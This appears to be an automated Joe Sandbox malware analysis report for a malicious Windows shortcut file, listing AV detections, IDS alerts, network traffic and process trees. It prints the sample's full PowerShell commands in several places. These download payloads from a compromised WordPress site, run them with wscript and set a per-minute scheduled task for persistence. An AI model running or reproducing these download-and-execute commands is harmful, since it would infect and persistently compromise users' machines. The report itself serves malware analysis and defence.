$OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ProcessId: 7332, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-03T09:14:04.951516+010028033053Unknown Traffic192.168.2.44973146.254.34.201443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: G9eWTvswoH.lnkReversingLabs: Detection: 45%
      Source: G9eWTvswoH.lnkVirustotal: Detection: 45%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
      Machine Learning detection for sample
      Source: G9eWTvswoH.lnkJoe Sandbox ML: detected
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49887 version: TLS 1.2

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1Host: www.italialife24.it
      Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 46.254.34.201:443
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1Host: www.italialife24.it
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.italialife24.it
      Source: powershell.exe, 0000000C.00000002.2448566614.000001E7F081A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsc
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B2D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B33C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFB3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D992C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://italialife24.it
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B5A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFF2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE5DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E84FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1726859837.0000017399C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAE561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D8351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B2D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B33C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFB3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D992C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.italialife24.it
      Source: powershell.exe, 00000000.00000002.1726859837.0000017399C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAE561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D8351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1726859837.000001739AE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAF18B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D94AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B5A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFF2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE5DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E84FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B2CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739AE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B31C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAF18B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it
      Source: wscript.exe, 00000007.00000002.1828005785.0000025EDB425000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2361827669.000001D1B0A15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38F1A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-c
      Source: wscript.exe, wscript.exe, 00000011.00000002.2890351508.00000204119D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content
      Source: wscript.exe, 0000000B.00000002.2305543593.0000017912415000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/0
      Source: wscript.exe, 00000011.00000002.2890351508.00000204119D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/a
      Source: powershell.exe, 00000012.00000002.2900184300.000001F38ED83000.00000004.00000800.00020000.00000000.sdmp, evQtmlDaSRMzUk.js.0.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
      Source: powershell.exe, 00000004.00000002.1882204354.0000026AC67F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
      Source: powershell.exe, 00000000.00000002.1750647815.00000173B1DDB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726429483.0000017397D8E000.00000004.00000020.00020000.00000000.sdmp, G9eWTvswoH.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
      Source: powershell.exe, 00000000.00000002.1726668334.0000017397EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
      Source: wscript.exe, 0000000F.00000002.2361872943.000001D1B2500000.00000004.00000020.00020000.00000000.sdmp, V58W09DALJEK.js.4.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
      Source: powershell.exe, 00000000.00000002.1750647815.00000173B1DDB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726429483.0000017397D8E000.00000004.00000020.00020000.00000000.sdmp, G9eWTvswoH.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
      Source: powershell.exe, 00000000.00000002.1726668334.0000017397EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
      Source: wscript.exe, 0000000F.00000002.2361872943.000001D1B2500000.00000004.00000020.00020000.00000000.sdmp, V58W09DALJEK.js.4.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49887 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
      Windows shortcut file (LNK) contains suspicious command line arguments
      Source: G9eWTvswoH.lnkLNK file: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.expl.evad.winLNK@24/13@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhporkgo.4ci.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: G9eWTvswoH.lnkReversingLabs: Detection: 45%
      Source: G9eWTvswoH.lnkVirustotal: Detection: 45%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /fJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
